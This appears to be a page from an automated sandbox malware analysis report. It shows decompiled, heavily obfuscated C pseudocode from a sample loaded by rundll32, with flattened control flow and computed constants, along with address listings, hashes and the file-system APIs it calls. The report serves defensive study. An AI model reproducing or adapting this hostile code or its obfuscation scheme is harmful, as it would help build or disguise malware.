				_v352 = 0x4c1d4a;
				_v352 = _v352 >> 0xd;
				_v352 = _v352 * 0xe;
				_v352 = _v352 ^ 0x0003e302;
				_v388 = 0x7e89b7;
				_v388 = _v388 / _t419;
				_t420 = 0x48;
				_v388 = _v388 / _t420;
				_t421 = 0x2b;
				_t414 = _v368;
				_v388 = _v388 / _t421;
				_v388 = _v388 ^ 0x000ed69e;
				_t422 = _v368;
				_v300 = 0xe9da01;
				_v300 = _v300 + 0xffffd878;
				_v300 = _v300 ^ 0x00eb5be0;
				_v336 = 0x6aaf6d;
				_v336 = _v336 * 0x22;
				_v336 = _v336 ^ 0x0e2b42a4;
				_v316 = 0x54d710;
				_v316 = _v316 >> 0xc;
				_v316 = _v316 ^ 0x0000014d;
				while(1) {
					L1:
					_t332 = 0x61250f6;
					do {
						while(1) {
							L2:
							_t427 = _t367 - _t332;
							if(_t427 > 0) {
								break;
							}
							if(_t427 == 0) {
								_t352 = E00380AE0(0x40, 1);
								_push(_v320);
								_push( &_v260);
								_push(_t352);
								_push(0xb);
								E003780E3(_v364, _v304);
								_t425 =  &(_t425[6]);
								_t367 = 0x97954ea;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x2db8754) {
								E00388519(_v360, _v348, _v292);
								E00388519(_v352, _v388, _t422);
								E00388519(_v300, _v336, _v284);
								_t367 = _t414;
								L33:
								_t332 = 0x61250f6;
								goto L34;
							}
							if(_t367 == 0x349a1a2) {
								_t422 = 0;
								E00374B61( &_v260, 0x100, _v376, _v344);
								_v284 = _v284 & 0;
								_v280 = _v280 & 0;
								_v292 = _v292 & 0;
								_v288 = _v288 & 0;
								_t367 = 0xea9523f;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x47b49b8) {
								if(_v288 >= _v316) {
									_t359 = E0038F435( &_v292,  &_v284);
								} else {
									_t359 = E0038A666( &_v292);
								}
								_t422 = _t359;
								_t332 = 0x61250f6;
								_t367 =  !=  ? 0x61250f6 : 0x2db8754;
								continue;
							}
							if(_t367 != 0x54d1846) {
								goto L34;
							}
							_t386 =  *0x393e08; // 0x0
							_t361 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 4))));
							 *((intOrPtr*)(_t386 + 0x14)) =  *((intOrPtr*)(_t386 + 0x14)) + 1;
							_t413 =  *((intOrPtr*)(_t386 + 0x14));
							 *((intOrPtr*)(_t386 + 4)) = _t361;
							if(_t361 == 0) {
								 *((intOrPtr*)(_t386 + 4)) =  *((intOrPtr*)(_t386 + 0x20));
							}
							_t362 =  *0x393e08; // 0x0
							if(_t413 >=  *_t362) {
								_t387 =  *0x393e08; // 0x0
								 *(_t387 + 0x14) =  *(_t387 + 0x14) & 0x00000000;
								L37:
								return _t364;
							} else {
								_t367 = 0x349a1a2;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
						}
						if(_t367 == 0x70f4b52) {
							E00388519(_v372, _v380, _v276);
							_t367 = 0x2db8754;
							goto L33;
						}
						if(_t367 == 0x97954ea) {
							_t335 =  *0x393e08; // 0x0
							_t338 =  *0x393e08; // 0x0
							_t343 =  *0x393e08; // 0x0
							_t345 = E0038E395( *((intOrPtr*)( *((intOrPtr*)(_t343 + 4)) + 0x1a)),  &_v284,  &_v276, _v356, _v412,  &_v260, _v396, _t422, _v404, _v368,  *((intOrPtr*)(_t338 + 4)) + 0x1c, _v408,  *( *((intOrPtr*)(_t335 + 4)) + 0x18) & 0x0000ffff);
							_t425 =  &(_t425[0xb]);
							if(_t345 == 0) {
								_t414 = 0x54d1846;
								_t367 = 0x2db8754;
							} else {
								_t367 = 0xcdb2e90;
							}
							while(1) {
								L1:
								_t332 = 0x61250f6;
								goto L2;
							}
						}
						if(_t367 == 0xcdb2e90) {
							_t347 = E00375548(_v324, _a24, _v332, _v340,  &_v276);
							_t425 =  &(_t425[4]);
							if(_t347 == 0) {
								_t414 = 0x54d1846;
							} else {
								_t414 = 0xa80516a;
								_t364 = 1;
							}
							_t367 = 0x70f4b52;
							while(1) {
								L1:
								_t332 = 0x61250f6;
								goto L2;
							}
						}
						if(_t367 != 0xea9523f) {
							goto L34;
						}
						_t349 = E0037CF47(_v296, _v384, _t423,  &_v292, _v400, _a8, _v312);
						_t425 =  &(_t425[5]);
						if(_t349 == 0) {
							goto L37;
						}
						_t367 = 0x47b49b8;
						goto L1;
						L34:
					} while (_t367 != 0xa80516a);
					goto L37;
				}
			}






































































                                                                                                                                                            0x003764ec
                                                                                                                                                            0x003764f3
                                                                                                                                                            0x003764f5
                                                                                                                                                            0x003764fc
                                                                                                                                                            0x00376503
                                                                                                                                                            0x0037650a
                                                                                                                                                            0x00376511
                                                                                                                                                            0x00376518
                                                                                                                                                            0x00376519
                                                                                                                                                            0x0037651a
                                                                                                                                                            0x0037651f
                                                                                                                                                            0x00376527
                                                                                                                                                            0x0037652a
                                                                                                                                                            0x00376537
                                                                                                                                                            0x0037653f
                                                                                                                                                            0x00376541
                                                                                                                                                            0x00376549
                                                                                                                                                            0x0037654e
                                                                                                                                                            0x00376556
                                                                                                                                                            0x0037655e
                                                                                                                                                            0x00376566
                                                                                                                                                            0x00376574
                                                                                                                                                            0x00376579
                                                                                                                                                            0x0037657f
                                                                                                                                                            0x00376587
                                                                                                                                                            0x00376592
                                                                                                                                                            0x0037659a
                                                                                                                                                            0x003765a5
                                                                                                                                                            0x003765b2
                                                                                                                                                            0x003765b5
                                                                                                                                                            0x003765b9
                                                                                                                                                            0x003765c1
                                                                                                                                                            0x003765c9
                                                                                                                                                            0x003765d1
                                                                                                                                                            0x003765d9
                                                                                                                                                            0x003765e1
                                                                                                                                                            0x003765e6
                                                                                                                                                            0x003765ee
                                                                                                                                                            0x003765f6
                                                                                                                                                            0x003765fe
                                                                                                                                                            0x00376606
                                                                                                                                                            0x0037660e
                                                                                                                                                            0x00376616
                                                                                                                                                            0x0037661e
                                                                                                                                                            0x00376626
                                                                                                                                                            0x00376636
                                                                                                                                                            0x0037663a
                                                                                                                                                            0x00376642
                                                                                                                                                            0x0037664a
                                                                                                                                                            0x00376652
                                                                                                                                                            0x0037665a
                                                                                                                                                            0x00376662
                                                                                                                                                            0x00376674
                                                                                                                                                            0x00376677
                                                                                                                                                            0x0037667b
                                                                                                                                                            0x00376683
                                                                                                                                                            0x0037668b
                                                                                                                                                            0x00376690
                                                                                                                                                            0x00376698
                                                                                                                                                            0x003766a0
                                                                                                                                                            0x003766a8
                                                                                                                                                            0x003766b0
                                                                                                                                                            0x003766b8
                                                                                                                                                            0x003766c0
                                                                                                                                                            0x003766c8
                                                                                                                                                            0x003766d2
                                                                                                                                                            0x003766da
                                                                                                                                                            0x003766e2
                                                                                                                                                            0x003766ea
                                                                                                                                                            0x003766ef
                                                                                                                                                            0x003766f4
                                                                                                                                                            0x003766fc
                                                                                                                                                            0x00376704
                                                                                                                                                            0x00376712
                                                                                                                                                            0x00376717
                                                                                                                                                            0x0037671d
                                                                                                                                                            0x00376722
                                                                                                                                                            0x0037672a
                                                                                                                                                            0x00376732
                                                                                                                                                            0x0037673a
                                                                                                                                                            0x00376742
                                                                                                                                                            0x0037674a
                                                                                                                                                            0x00376757
                                                                                                                                                            0x0037675a
                                                                                                                                                            0x0037675e
                                                                                                                                                            0x00376766
                                                                                                                                                            0x0037676e
                                                                                                                                                            0x00376776
                                                                                                                                                            0x00376783
                                                                                                                                                            0x00376787
                                                                                                                                                            0x0037678f
                                                                                                                                                            0x00376797
                                                                                                                                                            0x0037679f
                                                                                                                                                            0x003767a7
                                                                                                                                                            0x003767af
                                                                                                                                                            0x003767b7
                                                                                                                                                            0x003767bf
                                                                                                                                                            0x003767c7
                                                                                                                                                            0x003767cf
                                                                                                                                                            0x003767d7
                                                                                                                                                            0x003767df
                                                                                                                                                            0x003767e7
                                                                                                                                                            0x003767ef
                                                                                                                                                            0x003767f7
                                                                                                                                                            0x003767ff
                                                                                                                                                            0x00376804
                                                                                                                                                            0x0037680c
                                                                                                                                                            0x00376814
                                                                                                                                                            0x0037681c
                                                                                                                                                            0x00376824
                                                                                                                                                            0x00376829
                                                                                                                                                            0x00376831
                                                                                                                                                            0x00376839
                                                                                                                                                            0x00376841
                                                                                                                                                            0x00376846
                                                                                                                                                            0x0037684e
                                                                                                                                                            0x00376856
                                                                                                                                                            0x0037685e
                                                                                                                                                            0x00376863
                                                                                                                                                            0x0037686b
                                                                                                                                                            0x00376873
                                                                                                                                                            0x0037687d
                                                                                                                                                            0x00376881
                                                                                                                                                            0x00376889
                                                                                                                                                            0x00376899
                                                                                                                                                            0x003768a1
                                                                                                                                                            0x003768a6
                                                                                                                                                            0x003768b0
                                                                                                                                                            0x003768b3
                                                                                                                                                            0x003768b7
                                                                                                                                                            0x003768bb
                                                                                                                                                            0x003768c3
                                                                                                                                                            0x003768c7
                                                                                                                                                            0x003768d2
                                                                                                                                                            0x003768dd
                                                                                                                                                            0x003768e8
                                                                                                                                                            0x003768f5
                                                                                                                                                            0x003768f9
                                                                                                                                                            0x00376901
                                                                                                                                                            0x00376909
                                                                                                                                                            0x0037690e
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x0037691b
                                                                                                                                                            0x0037691b
                                                                                                                                                            0x0037691b
                                                                                                                                                            0x0037691b
                                                                                                                                                            0x0037691d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376923
                                                                                                                                                            0x00376a56
                                                                                                                                                            0x00376a5b
                                                                                                                                                            0x00376a6d
                                                                                                                                                            0x00376a72
                                                                                                                                                            0x00376a73
                                                                                                                                                            0x00376a75
                                                                                                                                                            0x00376a7a
                                                                                                                                                            0x00376a7d
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x0037692f
                                                                                                                                                            0x00376a16
                                                                                                                                                            0x00376a25
                                                                                                                                                            0x00376a3d
                                                                                                                                                            0x00376a43
                                                                                                                                                            0x00376bc8
                                                                                                                                                            0x00376bc8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376bc8
                                                                                                                                                            0x0037693b
                                                                                                                                                            0x003769d8
                                                                                                                                                            0x003769da
                                                                                                                                                            0x003769df
                                                                                                                                                            0x003769e6
                                                                                                                                                            0x003769ed
                                                                                                                                                            0x003769f4
                                                                                                                                                            0x003769fd
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376947
                                                                                                                                                            0x00376999
                                                                                                                                                            0x003769a9
                                                                                                                                                            0x0037699b
                                                                                                                                                            0x0037699b
                                                                                                                                                            0x0037699b
                                                                                                                                                            0x003769ae
                                                                                                                                                            0x003769b7
                                                                                                                                                            0x003769bc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003769bc
                                                                                                                                                            0x0037694f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376955
                                                                                                                                                            0x0037695e
                                                                                                                                                            0x00376960
                                                                                                                                                            0x00376963
                                                                                                                                                            0x00376966
                                                                                                                                                            0x0037696b
                                                                                                                                                            0x00376970
                                                                                                                                                            0x00376970
                                                                                                                                                            0x00376973
                                                                                                                                                            0x0037697a
                                                                                                                                                            0x00376bdb
                                                                                                                                                            0x00376be1
                                                                                                                                                            0x00376be8
                                                                                                                                                            0x00376bf1
                                                                                                                                                            0x00376980
                                                                                                                                                            0x00376980
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x0037697a
                                                                                                                                                            0x00376a8d
                                                                                                                                                            0x00376bbd
                                                                                                                                                            0x00376bc3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376bc3
                                                                                                                                                            0x00376a99
                                                                                                                                                            0x00376b34
                                                                                                                                                            0x00376b4c
                                                                                                                                                            0x00376b7d
                                                                                                                                                            0x00376b89
                                                                                                                                                            0x00376b8e
                                                                                                                                                            0x00376b93
                                                                                                                                                            0x00376b9f
                                                                                                                                                            0x00376ba4
                                                                                                                                                            0x00376b95
                                                                                                                                                            0x00376b95
                                                                                                                                                            0x00376b95
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376aa5
                                                                                                                                                            0x00376b0f
                                                                                                                                                            0x00376b14
                                                                                                                                                            0x00376b19
                                                                                                                                                            0x00376b25
                                                                                                                                                            0x00376b1b
                                                                                                                                                            0x00376b1d
                                                                                                                                                            0x00376b22
                                                                                                                                                            0x00376b22
                                                                                                                                                            0x00376b2a
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376aad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376ad6
                                                                                                                                                            0x00376adb
                                                                                                                                                            0x00376ae0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376ae6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376bcd
                                                                                                                                                            0x00376bcd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376bd9

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %}$?M\$W3pR$YN$bN-j$KL?$Ty$Ty$[$[
                                                                                                                                                            • API String ID: 0-2895984816
                                                                                                                                                            • Opcode ID: 647cfcd5b443f6fd6dc96c79f4c6902397fae48d6853c9e9fe1a1b63e21bb1c2
                                                                                                                                                            • Instruction ID: 4c1178e7d857cf17106821bf0b54879b7c2d772a932b7feb1da7c1dd6f347291
                                                                                                                                                            • Opcode Fuzzy Hash: 647cfcd5b443f6fd6dc96c79f4c6902397fae48d6853c9e9fe1a1b63e21bb1c2
                                                                                                                                                            • Instruction Fuzzy Hash: 370256725087809FC3A9CF65C596A5BBBE1FBC5318F20890DF6DA86260C7B4C949CF42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10021854 Relevance: 12.1, APIs: 8, Instructions: 129filestringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                                                            • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                                                            • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                                                            • CharUpperA.USER32 ref: 10021943
                                                                                                                                                            • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3249967234-0
                                                                                                                                                            • Opcode ID: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                                                            • Instruction ID: 60a4613adf5c573b6f7ecf717c69f11d5bc108e5d701f0798ce0fed1b7752ca1
                                                                                                                                                            • Opcode Fuzzy Hash: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                                                            • Instruction Fuzzy Hash: 0E41DF7990024AAFEB11DFB4DC95AFF77BCEF14355F800529F815E2192EB30A944CA61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00375E60 Relevance: 11.6, Strings: 9, Instructions: 323COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E00375E60(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				void* _t339;
				intOrPtr _t372;
				void* _t374;
				intOrPtr _t381;
				intOrPtr _t382;
				void* _t384;
				intOrPtr* _t385;
				void* _t387;
				intOrPtr _t421;
				intOrPtr* _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int* _t437;

				_t385 = _a8;
				_push(_t385);
				_push(_a4);
				_t423 = __ecx;
				_push(__edx);
				_push(__ecx);
				E003820B9(_t339);
				_v12 = 0xbcdf6a;
				_t437 =  &(( &_v148)[4]);
				_t421 = 0;
				_v8 = 0;
				_t387 = 0xc04f77e;
				_v92 = 0x11f6ef;
				_v92 = _v92 + 0xffffb184;
				_t424 = 0x71;
				_v92 = _v92 / _t424;
				_t425 = 0x24;
				_v92 = _v92 / _t425;
				_v92 = _v92 ^ 0x0000011d;
				_v56 = 0xfaa796;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x003ea801;
				_v36 = 0x1650e4;
				_v36 = _v36 + 0xce7;
				_v36 = _v36 ^ 0x00165dcb;
				_v116 = 0x54bb44;
				_v116 = _v116 + 0xffff1cdd;
				_v116 = _v116 + 0xffffa99d;
				_v116 = _v116 + 0xa8e5;
				_v116 = _v116 ^ 0x00542aa3;
				_v148 = 0xce1ee6;
				_v148 = _v148 ^ 0xff8bbe67;
				_v148 = _v148 | 0x521cb43f;
				_v148 = _v148 << 1;
				_v148 = _v148 ^ 0xfebb697e;
				_v52 = 0xc2bf1c;
				_v52 = _v52 << 0xc;
				_t426 = 0x73;
				_v52 = _v52 / _t426;
				_v52 = _v52 ^ 0x0061d2eb;
				_v88 = 0x8d6fba;
				_v88 = _v88 * 0x6a;
				_v88 = _v88 * 0x21;
				_v88 = _v88 >> 0xb;
				_v88 = _v88 ^ 0x00119314;
				_v48 = 0xec8dbc;
				_v48 = _v48 + 0xffff0a61;
				_v48 = _v48 | 0x0a9d8147;
				_v48 = _v48 ^ 0x0affcc17;
				_v24 = 0xd16d2c;
				_v24 = _v24 >> 2;
				_v24 = _v24 ^ 0x003dd5e6;
				_v124 = 0xaffa28;
				_v124 = _v124 >> 9;
				_v124 = _v124 * 9;
				_v124 = _v124 ^ 0x3775f33c;
				_v124 = _v124 ^ 0x377a4e54;
				_v76 = 0x9eb952;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 << 0xa;
				_v76 = _v76 ^ 0x00160abd;
				_v108 = 0x8bec79;
				_t427 = 0x28;
				_v108 = _v108 * 0x30;
				_v108 = _v108 + 0xffff86d5;
				_v108 = _v108 + 0xffff5405;
				_v108 = _v108 ^ 0x1a3a719b;
				_v132 = 0x74267e;
				_v132 = _v132 + 0x1b76;
				_v132 = _v132 << 4;
				_v132 = _v132 + 0xffff1414;
				_v132 = _v132 ^ 0x074c11a2;
				_v100 = 0x4236e1;
				_v100 = _v100 ^ 0x96e608d5;
				_v100 = _v100 / _t427;
				_t428 = 0x2d;
				_v100 = _v100 * 0x6c;
				_v100 = _v100 ^ 0x96bd808a;
				_v84 = 0xb83730;
				_v84 = _v84 + 0xffffd15d;
				_v84 = _v84 >> 0xb;
				_v84 = _v84 ^ 0x0009ec33;
				_v140 = 0x532b06;
				_v140 = _v140 ^ 0xb0124270;
				_v140 = _v140 << 1;
				_v140 = _v140 / _t428;
				_v140 = _v140 ^ 0x02279f8d;
				_v44 = 0x33dfa;
				_v44 = _v44 + 0x1c37;
				_v44 = _v44 ^ 0x000817ba;
				_v136 = 0x1bf887;
				_v136 = _v136 ^ 0x189cf430;
				_v136 = _v136 + 0xffff0896;
				_v136 = _v136 ^ 0xf213b32f;
				_v136 = _v136 ^ 0xea9313b1;
				_v144 = 0xffa314;
				_v144 = _v144 >> 7;
				_v144 = _v144 ^ 0x35f9e2de;
				_t429 = 0x1f;
				_v144 = _v144 * 0x5b;
				_v144 = _v144 ^ 0x2f3e99d8;
				_v68 = 0x41f910;
				_v68 = _v68 / _t429;
				_v68 = _v68 ^ 0x28681de5;
				_v68 = _v68 ^ 0x2865ac71;
				_v96 = 0x6e33;
				_v96 = _v96 << 4;
				_v96 = _v96 ^ 0xe7b8475a;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0xcf7b3a2b;
				_v104 = 0xedfca3;
				_t430 = 0x5e;
				_v104 = _v104 * 0x5f;
				_v104 = _v104 | 0x0b07679d;
				_v104 = _v104 ^ 0xc050dc4c;
				_v104 = _v104 ^ 0x9b058770;
				_v112 = 0xe25509;
				_v112 = _v112 ^ 0xf6d0fdca;
				_v112 = _v112 / _t430;
				_v112 = _v112 ^ 0x02984cdf;
				_v40 = 0xf7137d;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0xf71f8dee;
				_v64 = 0x5508e8;
				_v64 = _v64 << 4;
				_v64 = _v64 | 0x94c676b5;
				_v64 = _v64 ^ 0x95dffb87;
				_v120 = 0xc732ae;
				_t431 = 0x75;
				_v120 = _v120 / _t431;
				_v120 = _v120 << 7;
				_t432 = 0x2c;
				_v120 = _v120 / _t432;
				_v120 = _v120 ^ 0x000601dd;
				_v72 = 0x179b9;
				_v72 = _v72 >> 1;
				_v72 = _v72 << 0xb;
				_v72 = _v72 ^ 0x05ec7a60;
				_v28 = 0x46261b;
				_t433 = 0x35;
				_v28 = _v28 / _t433;
				_v28 = _v28 ^ 0x000e773f;
				_v128 = 0xfd046c;
				_v128 = _v128 << 1;
				_v128 = _v128 << 3;
				_v128 = _v128 + 0xffff42a9;
				_v128 = _v128 ^ 0x0fc89804;
				_v60 = 0xb39cb2;
				_v60 = _v60 + 0xffffa360;
				_v60 = _v60 ^ 0x6e5a7866;
				_v60 = _v60 ^ 0x6eef17c9;
				_v32 = 0xb015d5;
				_t434 = 0x33;
				_v32 = _v32 / _t434;
				_v32 = _v32 ^ 0x00082471;
				_v80 = 0x87b3ae;
				_v80 = _v80 + 0xffffe530;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x021b575c;
				while(_t387 != 0x5e373ec) {
					if(_t387 == 0x87b20b3) {
						_t372 =  *0x393dfc; // 0x0
						_t374 = E0037CA90(_v96, _v56, _v104, _v112,  *((intOrPtr*)(_t423 + 4)), _v40, _t387, _v16, _t387,  &_v16, _v64, _v120, _v20, _v72, _v28, _v128, _v60, _v52,  *_t423,  *((intOrPtr*)(_t372 + 0x64)));
						_t437 =  &(_t437[0x12]);
						if(_t374 == _v88) {
							 *_t385 = _v20;
							_t421 = 1;
							 *((intOrPtr*)(_t385 + 4)) = _v16;
						} else {
							_t387 = 0x5e373ec;
							continue;
						}
					} else {
						if(_t387 == 0xc04f77e) {
							_t387 = 0xd382560;
							continue;
						} else {
							if(_t387 == 0xc68a5f7) {
								_push(_t387);
								_push(_t387);
								_t381 = E00377FF2(_v16);
								_v20 = _t381;
								if(_t381 != 0) {
									_t387 = 0x87b20b3;
									continue;
								}
							} else {
								if(_t387 != 0xd382560) {
									L14:
									if(_t387 != 0x4d23f0b) {
										continue;
									} else {
									}
								} else {
									_t382 =  *0x393dfc; // 0x0
									_t384 = E0037CA90(_v48, _v92, _v24, _v124,  *((intOrPtr*)(_t423 + 4)), _v76, _t387, _v36, _t387,  &_v16, _v108, _v132, _t421, _v100, _v84, _v140, _v44, _v116,  *_t423,  *((intOrPtr*)(_t382 + 0x64)));
									_t437 =  &(_t437[0x12]);
									if(_t384 == _v148) {
										_t387 = 0xc68a5f7;
										continue;
									}
								}
							}
						}
					}
					return _t421;
				}
				E00388519(_v32, _v80, _v20);
				_t387 = 0x4d23f0b;
				goto L14;
			}





























































                                                                                                                                                            0x00375e67
                                                                                                                                                            0x00375e71
                                                                                                                                                            0x00375e72
                                                                                                                                                            0x00375e79
                                                                                                                                                            0x00375e7b
                                                                                                                                                            0x00375e7c
                                                                                                                                                            0x00375e7d
                                                                                                                                                            0x00375e82
                                                                                                                                                            0x00375e8d
                                                                                                                                                            0x00375e90
                                                                                                                                                            0x00375e94
                                                                                                                                                            0x00375e9b
                                                                                                                                                            0x00375ea0
                                                                                                                                                            0x00375ea8
                                                                                                                                                            0x00375eb6
                                                                                                                                                            0x00375ebb
                                                                                                                                                            0x00375ec5
                                                                                                                                                            0x00375eca
                                                                                                                                                            0x00375ed0
                                                                                                                                                            0x00375ed8
                                                                                                                                                            0x00375ee0
                                                                                                                                                            0x00375ee5
                                                                                                                                                            0x00375eea
                                                                                                                                                            0x00375ef2
                                                                                                                                                            0x00375efd
                                                                                                                                                            0x00375f08
                                                                                                                                                            0x00375f13
                                                                                                                                                            0x00375f1b
                                                                                                                                                            0x00375f23
                                                                                                                                                            0x00375f2b
                                                                                                                                                            0x00375f33
                                                                                                                                                            0x00375f3b
                                                                                                                                                            0x00375f43
                                                                                                                                                            0x00375f4b
                                                                                                                                                            0x00375f53
                                                                                                                                                            0x00375f57
                                                                                                                                                            0x00375f5f
                                                                                                                                                            0x00375f67
                                                                                                                                                            0x00375f70
                                                                                                                                                            0x00375f73
                                                                                                                                                            0x00375f77
                                                                                                                                                            0x00375f7f
                                                                                                                                                            0x00375f8c
                                                                                                                                                            0x00375f95
                                                                                                                                                            0x00375f99
                                                                                                                                                            0x00375f9e
                                                                                                                                                            0x00375fa6
                                                                                                                                                            0x00375fae
                                                                                                                                                            0x00375fb6
                                                                                                                                                            0x00375fbe
                                                                                                                                                            0x00375fc6
                                                                                                                                                            0x00375fd1
                                                                                                                                                            0x00375fd9
                                                                                                                                                            0x00375fe4
                                                                                                                                                            0x00375fec
                                                                                                                                                            0x00375ff6
                                                                                                                                                            0x00375ffa
                                                                                                                                                            0x00376002
                                                                                                                                                            0x0037600a
                                                                                                                                                            0x00376012
                                                                                                                                                            0x00376017
                                                                                                                                                            0x0037601c
                                                                                                                                                            0x00376024
                                                                                                                                                            0x00376035
                                                                                                                                                            0x00376038
                                                                                                                                                            0x0037603c
                                                                                                                                                            0x00376044
                                                                                                                                                            0x0037604c
                                                                                                                                                            0x00376054
                                                                                                                                                            0x0037605c
                                                                                                                                                            0x00376064
                                                                                                                                                            0x00376069
                                                                                                                                                            0x00376071
                                                                                                                                                            0x00376079
                                                                                                                                                            0x00376081
                                                                                                                                                            0x00376091
                                                                                                                                                            0x0037609a
                                                                                                                                                            0x0037609d
                                                                                                                                                            0x003760a1
                                                                                                                                                            0x003760a9
                                                                                                                                                            0x003760b1
                                                                                                                                                            0x003760b9
                                                                                                                                                            0x003760be
                                                                                                                                                            0x003760c6
                                                                                                                                                            0x003760ce
                                                                                                                                                            0x003760d6
                                                                                                                                                            0x003760e2
                                                                                                                                                            0x003760e6
                                                                                                                                                            0x003760ee
                                                                                                                                                            0x003760f6
                                                                                                                                                            0x003760fe
                                                                                                                                                            0x00376106
                                                                                                                                                            0x0037610e
                                                                                                                                                            0x00376116
                                                                                                                                                            0x0037611e
